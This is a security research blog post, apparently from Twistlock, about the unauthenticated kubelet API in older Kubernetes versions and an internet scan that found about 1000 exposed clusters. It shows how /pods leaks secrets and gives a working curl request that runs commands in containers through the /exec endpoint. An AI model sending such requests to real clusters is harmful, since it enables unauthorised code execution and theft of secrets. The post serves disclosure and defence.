Since I started at Twistlock, I’ve learned about the cloud native ecosystem and the vast variety of software that is involved in it. After I discovered the first instance of weak default settings in this huge ecosystem, it became a kind of a hobby for me. Now, every couple of months, I’ll check out different components of the cloud native ecosystem. Kubernetes was one of my main focus areas.

During my investigation, I stumbled on a bunch of old git issues that present an authentication problem within kubelet’s api and the recent fixing commit. But as we learned from past research, people are not always very fast or eager to update their software stack, and knowing that the commit is relatively fresh, I was interested to see if this is a widespread issue. So I began to look for such systems over the internet and analyzing their status, but first – let’s understand the issue and it’s implications;

Kubernetes Authentication Issue

During my Kubernetes investigation, I focused on a key issue that was introduced at the dawn of kubelet around 4 years ago, and fixed on the 14th of February 2018 around the release of Kubernetes 1.9.4.

The problem is a simple one —there was no authentication on the API server of kubelet. Additionally,the API server exposes an undocumented /exec endpoint which allows anyone to execute anything inside any container of the cluster (the kubelet documentation seems to be incomplete).

There are two ports that kubelet listens on:

  • 10250 is an HTTPS port that exposes the kubelet API.
  • 10255 is a HTTP port that serves the same API as read-only.

In order to get execution we would need to know some information about the cluster.Specifically we would need to pick the namespace, the pod and the container in which we want to run the command; in order to get all this information we can simply go to https://localhost:10250/pods assuming kubelet is served on localhost.

This request will return a json file that contains valuable information. For example when people use environment variables to pass secrets, sometimes these environment variables are visible— together with a detailed breakdown of the namespaces, their pods and the containers that are running in them

From the list, we can pick all the required data in order to interact with the /exec endpoint

So armed with the information, we can send a request that will execute the ‘ls’ command on our target:

curl –http2 –insecure -H “X-Stream-Protocol-Version: v2.channel.k8s.io” -H “X-Stream-Protocol-Version: channel.k8s.io” “https://localhost:10250/exec/sys-adm/node-directory-size-metrics-av-429f2ab/caddy?command=ls&input=1&output=1&tty=1”

Notice that I set the –http2 flag because kubelet is using SPDY and you won’t be able to communicate over standard http.
SPDY is a deprecated open-specification networking protocol that was developed primarily at Google for transporting web content, but it is still used in Kubernetes

By executing this curl command, we will receive back a response of sorts:

In order to see the results of our command we will need to execute a get request with a tool such as wscat combined with the URI from the response in the previous request:

So essentially if you are exposing your kubelet’s IP to the internet intentionally or unintentionally, you should make sure that this ports are locked. This is exactly what I wanted to check on at a large scale.

Over 1000 Compromised Servers

After I learned how to exploit a single instance, I automated the process to determine which servers were affected by the issue.

After gathering close to 80,000 servers and analyzing them, I found that about 1000 servers are affected by this problem. Consequently, I started to explore whether it was possible to identify the owner of the cluster in order to responsibility disclose their weakness. This process can take some time. I was able to gather that some of the clusters belong to corporations, educational institutions, infrastructure companies, and others under private ownership. Finally, I decided to recheck the servers in order to see if the status changed. To my surprise, the number dropped to 120, This shows an amazing patch adoption rate for Kubernetes.

Mitigation

People make mistakes often. After all, we are human, and we are fallible. It’s the thing that most easily proves that we’re not a machine. If software makes a mistake, it’s almost indefinitely because a human programmed or configured it incorrectly. Some mistakes are extremely hard to find, others might be right under our noses but out of our attention.

One example could be the issue we talked about today, such weak defaults often leave data exposed to the internet for anyone to grab. For this reason, Twistlock can alert on weak defaults and misconfigured services that would expose data freely, so you can be assured that this will not slip unnoticed.